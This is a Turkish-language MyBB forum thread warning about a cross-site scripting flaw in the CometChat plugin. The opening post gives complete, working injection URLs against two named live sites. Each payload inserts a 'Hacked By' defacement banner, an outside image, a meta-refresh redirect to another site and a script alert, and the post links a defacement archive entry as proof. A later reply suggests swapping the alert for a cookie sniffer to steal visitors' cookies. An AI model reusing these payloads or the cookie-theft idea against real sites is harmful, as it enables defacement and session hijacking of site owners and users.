MyBB Depo Forum
CometChat Plugin Açığı [HACK Yiyebilirsiniz] - Baskı Önizleme

+- MyBB Depo Forum (https://mybbdepo.com)
+-- Forum: MyBB Genel Depo (https://mybbdepo.com/mybb-genel-depo-forumu)
+--- Forum: MyBB Güvenlik (https://mybbdepo.com/mybb-guvenlik-forumu)
+--- Konu Başlığı: CometChat Plugin Açığı [HACK Yiyebilirsiniz] (/cometchat-plugin-acigi-hack-yiyebilirsiniz-konusu.html)

Sayfalar: 1 2

CometChat Plugin Açığı [HACK Yiyebilirsiniz] - -NmDahmeT - 01-03-2014

Arkadaşlar Cometchat eklentisini mybb kullanıcıları facebook vs. gibi bir görünüme sahip olduğundan ve güzel bir plugin olduğundan tercih ediyor, ama size önermiyorum. Bu eklentide açıklar mevcut.

Örnek bir link:
Kod:
http://cryptr.org/cometchat/plugins/handwrite/index.php?id=%22%3E%3Ch1%3EHacked%20By%20NmDahmeT%20!%3C/h1%3E%3Cimg%20src=http://www.forumtarz.com/images/logo3.png%3E%3Cmeta%20http-equiv=%22refresh%22%20content=%221;URL=http://forumtarz.com/NmDahmeT/%22%3E%3Cscript%3Ealert%28%22ownz%20NmDahmeT%20-%20FT%22%29%3C/script%3Ehttp://cryptr.org/cometchat/plugins/handwrite/index.php?id=%22%3E%3Ch1%3EHacked%20By%20NmDahmeT%20!%3C/h1%3E%3C

Bu adreste olmuyor, lakin zone alınca yönlendirme işliyor.

Zone:
Kod:
http://golgeler.net/view-%3E302959

Site sunumlarında gezerken bir site gördüm oradada var bu eklenti.

Site adresi:
Kod:
http://www.teknology.bl.ee

Açık;
Kod:
http://www.teknology.bl.ee/cometchat/plugins/handwrite/index.php?id=%22%3E%3Ch1%3EHacked%20By%20NmDahmeT%20!%3C/h1%3E%3Cimg%20src=http://www.forumtarz.com/images/logo3.png%3E%3Cmeta%20http-equiv=%22refresh%22%20content=%221;URL=http://forumtarz.com/NmDahmeT/%22%3E%3Cscript%3Ealert%28%22ownz%20NmDahmeT%20-%20FT%22%29%3C/script%3Ehttp://teknology.bl.ee/cometchat/plugins/handwrite/index.php?id=%22%3E%3Ch1%3EHacked%20By%20NmDahmeT%20!%3C/h1%3E%3C

Not;
Kod:
http://www.teknology.bl.ee
sitesi plugini ziyaretçilere gizlemiş üye olup bakarsanız oradada aynı açık var, bu eklentiyi ya kullanmayın yada ziyaretçilere gizleyin.

İyi forumlar !

Cvp: Plugin Sorunu [HACK Yiyebilirsiniz] - Smyrna35 - 01-03-2014

Warez olan bir eklentiden açık olmamasını nasıl bekleyebilirizki ?

Cvp: Plugin Sorunu [HACK Yiyebilirsiniz] - -NmDahmeT - 01-03-2014

(01-03-2014, Saat:21:17)Smyrna35 Adlı Kullanıcıdan Alıntı: Warez olan bir eklentiden açık olmamasını nasıl bekleyebilirizki ?

Çok doğru hocam, inşallah kullanmazlar bu ve benzeri pluginleri..

Cvp: Plugin Sorunu [HACK Yiyebilirsiniz] - SkullzDe2 - 01-03-2014

Aynen Öyle Fakat Nasıl İndex Atıyorlarki O Açık İle Tedbirimizi Alalım.

Cvp: Plugin Sorunu [HACK Yiyebilirsiniz] - sp4wn - 01-03-2014

Xss vuln. Googlede xss acigi kapatma diye aratirsaniz bulabilirsiniz.

Cvp: Plugin Sorunu [HACK Yiyebilirsiniz] - EmreKarakaya - 01-03-2014

Öncellikle başlık yanlış olmuş.Başlık sanki bütün eklentilerden hack yiyebileceğimizi gösteriyor.

Cvp: CometChat Plugin Açığı [HACK Yiyebilirsiniz] - -NmDahmeT - 02-03-2014

başlığı değiştirdim.

Cvp: CometChat Plugin Açığı [HACK Yiyebilirsiniz] - istanbul123 - 02-03-2014

Xss alert vericegine bi sniffer çaksan cooikeleri çekersin gölgeler.net'in sahibi arkadaşimiz böyle giderse xss'li siteleri zone almayi yasaklicagiz Açık Ağızlı Gülümseme